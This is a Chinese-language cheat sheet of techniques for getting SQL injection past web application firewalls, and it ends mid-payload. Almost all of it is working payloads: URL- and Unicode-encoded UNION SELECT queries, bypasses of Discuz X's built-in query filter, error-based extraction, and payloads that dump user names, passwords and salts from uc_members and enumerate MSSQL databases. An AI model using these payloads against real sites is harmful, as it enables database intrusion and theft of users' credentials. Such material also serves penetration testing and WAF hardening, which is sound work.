WAF 绕过的各种方法总结
一、 各种编码绕过
1. URL 编码
?id=1 union select pass from admin limit 1
?id=1%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%70%61%73%73%20%66%72%6f%6d%
20%61%64%6d%69%6e%20%6c%69%6d%69%74%20%31
2. Unicode 编码
'e' => '%u0065', //这是他的 Unicode 编码
?id=1 union select pass from admin limit 1
?id=1 un%u0069on sel%u0065ct pass f%u0072om admin li%u006dit 1
3. 针对 disucz x 内置_do_query_safe()的绕过
gid=1 and 1=2 union select
1,2,3,4,5,6,concat(user,0x23,password),8,9,10,11,12,13 from mysql.user 拦截
gid=1 and 1=2 union /*!50000select*/
1,2,3,4,5,6,concat(user,0x23,password),8,9,10,11,12,13 from mysql.user 绕过
disucz x2.0
gid=@`'` union select
@`'`,2,3,4,5,6,7,concat(user,0x3a,password),9,10,11,12,13,14 from
mysql.user 绕过 disucz x2.5
gid=`'` or @`''` union select 1 from (select count(*),concat((select
database()),floor(rand(0)*2))a from information_schema.tables group by a)b
where @`'` 绕过
disucz x2.5 二次修补
这里我引入了`'`用来隐藏第一个@字符,并将第一个@`'`替换为@`''`,这样便可以替
换掉第二个@
4. 绕过某 waf –by havij
/*!30000union all select (select distinct
concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from
`information_schema`.schemata limit 10,1),null,null,null,null*/--
list.php?yw=bj&id=3&id=1 /*!30000union all select (select
concat(0x27,uid,0x5e,username,0x5e,password,0x5e,email,0x5e,salt,0x27) from
`gs_ucenter`.uc_members limit 0,1) ,null,null,null,null*/--
5. 某次笔记
newsid=60+a%nd%201=(se%lect%20@@VERSION)--
newsid=60+a%nd%201=(se%lect%20@@servername)--
newsid=60+a%nd 1=(se%lect name f%rom mas%ter.dbo.sysd%atabases wh%ere
dbid=1)--
newsid=60+a%nd (se%lect t%o%p 1 name f%rom pedaohang.d%b%o.s%ys%obje%cts
where xtype='U' a%nd name not in (se%lect top 1 name fr%om